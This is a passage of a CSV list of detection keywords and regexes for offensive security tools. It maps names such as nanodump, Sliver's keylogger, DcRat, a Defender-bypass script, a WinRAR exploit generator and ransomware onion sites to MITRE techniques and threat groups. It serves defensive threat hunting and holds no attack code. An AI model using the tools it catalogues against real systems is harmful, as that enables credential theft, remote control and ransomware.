- Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 
29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","56237" "*randomalice1986@*",".{0,1000}randomalice1986\@.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","#email","email user name","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","56238" "*-RandomAttackPath -Token*",".{0,1000}\-RandomAttackPath\s\-Token.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","0","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","56239" "*randombob1986@*",".{0,1000}randombob1986\@.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","#email","email user name","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","56240" "*randomize_sw2_seed.py*",".{0,1000}randomize_sw2_seed\.py.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","56241" "*Ransom:Win32/Sodinokibi*",".{0,1000}Ransom\:Win32\/Sodinokibi.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","56251" "*Ransomware POC tool that encrypts a given directory*",".{0,1000}Ransomware\sPOC\stool\sthat\sencrypts\sa\sgiven\sdirectory.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","56256" "*Ransomware.dll*",".{0,1000}Ransomware\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","56257" "*Ransomware.pdb*",".{0,1000}Ransomware\.pdb.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","56258" "*ransomware_config.py*",".{0,1000}ransomware_config\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","56259" "*ransomware_payload.py*",".{0,1000}ransomware_payload\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","56260" "*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*",".{0,1000}Ransomware\-E20F7CED\-42AD\-485E\-BE4D\-DE21DCE58EC0\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","56261" "*RansomwarePoc.cpp*",".{0,1000}RansomwarePoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - 
T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","56262" "*RansomwarePoc.exe*",".{0,1000}RansomwarePoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","56263" "*RansomwarePoc\RansomwarePoc*",".{0,1000}RansomwarePoc\\RansomwarePoc.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","56264" "*ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion*",".{0,1000}ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56265" "*ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion*",".{0,1000}ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56266" 
"*ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion.ly*",".{0,1000}ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56267" "*ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd.onion.ly*",".{0,1000}ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56268" "*rapid7.github.io/metasploit-framework/api/*",".{0,1000}rapid7\.github\.io\/metasploit\-framework\/api\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","56270" "*rapid7/metasploit-omnibus*",".{0,1000}rapid7\/metasploit\-omnibus.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","56271" "*Rar a -v3g -k -r -s -m3 *",".{0,1000}Rar\sa\s\-v3g\s\-k\s\-r\s\-s\s\-m3\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","56273" "*rar2john *",".{0,1000}rar2john\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56274" "*rar2john.*",".{0,1000}rar2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56275" "*rarce *.pdf *.rar*",".{0,1000}rarce\s.{0,1000}\.pdf\s.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56276" "*rarce *.rar*",".{0,1000}rarce\s.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56277" "*rarce-1.0.0.tar.gz*",".{0,1000}rarce\-1\.0\.0\.tar\.gz.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56278" 
"*rarce-1.0.0-py3-none-any.whl*",".{0,1000}rarce\-1\.0\.0\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","56279" "*rasman*whoami*",".{0,1000}rasman.{0,1000}whoami.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56280" "*RasMan.vcxproj*",".{0,1000}RasMan\.vcxproj.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56281" "*rasman_c.c*",".{0,1000}rasman_c\.c.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56282" "*rasman_h.h*",".{0,1000}rasman_h\.h.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56283" 
"*RasmanPotato-master*",".{0,1000}RasmanPotato\-master.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","56284" "*rastamouse.me/dumping-lsass-with-duplicated-handles*",".{0,1000}rastamouse\.me\/dumping\-lsass\-with\-duplicated\-handles.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","56285" "*rasta-mouse/PPEnum*",".{0,1000}rasta\-mouse\/PPEnum.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","56286" "*rasta-mouse/RuralBishop*",".{0,1000}rasta\-mouse\/RuralBishop.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and 
then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","56287" "*rasta-mouse/SharpC2*",".{0,1000}rasta\-mouse\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","56288" "*rasta-mouse/ThreatCheck*",".{0,1000}rasta\-mouse\/ThreatCheck.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","56289" "*rasta-mouse/TikiTorch*",".{0,1000}rasta\-mouse\/TikiTorch.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","56290" "*rat communications are NOT SECURE. 
Do not send sensitive info through the C2 channel unless using SSL*",".{0,1000}rat\scommunications\sare\sNOT\sSECURE\.\sDo\snot\ssend\ssensitive\sinfo\sthrough\sthe\sC2\schannel\sunless\susing\sSSL.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","56291" "*ratchatPT*/bin/bash*",".{0,1000}ratchatPT.{0,1000}\/bin\/bash.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","#linux","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56292" "*RatChatPT.exe*",".{0,1000}RatChatPT\.exe.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56293" "*RatChatPT.exe*",".{0,1000}RatChatPT\.exe.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56294" "*RatChatPT_windows.exe*",".{0,1000}RatChatPT_windows\.exe.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56295" 
"*RatChatPT_windows.exe*",".{0,1000}RatChatPT_windows\.exe.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56296" "*ratchatpt-main*",".{0,1000}ratchatpt\-main.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56297" "*ratchatpt-main*",".{0,1000}ratchatpt\-main.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","56298" "*raw*/straight-shooter.c*",".{0,1000}raw.{0,1000}\/straight\-shooter\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","56303" "*raw.githubusercontent.com/6nz/virustotal-vm-blacklist/*",".{0,1000}raw\.githubusercontent\.com\/6nz\/virustotal\-vm\-blacklist\/.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","56385" 
"*raw.githubusercontent.com/Flangvik/statistically-likely-usernames/*",".{0,1000}raw\.githubusercontent\.com\/Flangvik\/statistically\-likely\-usernames\/.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","56386" "*raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1*",".{0,1000}raw\.githubusercontent\.com\/peass\-ng\/PEASS\-ng\/master\/winPEAS\/winPEASps1\/winPEAS\.ps1.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","56387" "*raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection*",".{0,1000}raw\.githubusercontent\.com\/swagkarna\/Bypass\-Tamper\-Protection.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","56388" "*raw_keylogger *","raw_keylogger\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","56389" "*raw_keylogger.tar.gz*",".{0,1000}raw_keylogger\.tar\.gz.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","56390" "*raworldw32b2qxevn3gp63pvibgixr4v75z62etlptg3u3pmajwra4ad.onion*",".{0,1000}raworldw32b2qxevn3gp63pvibgixr4v75z62etlptg3u3pmajwra4ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56391" "*rawrelayserver.py*",".{0,1000}rawrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
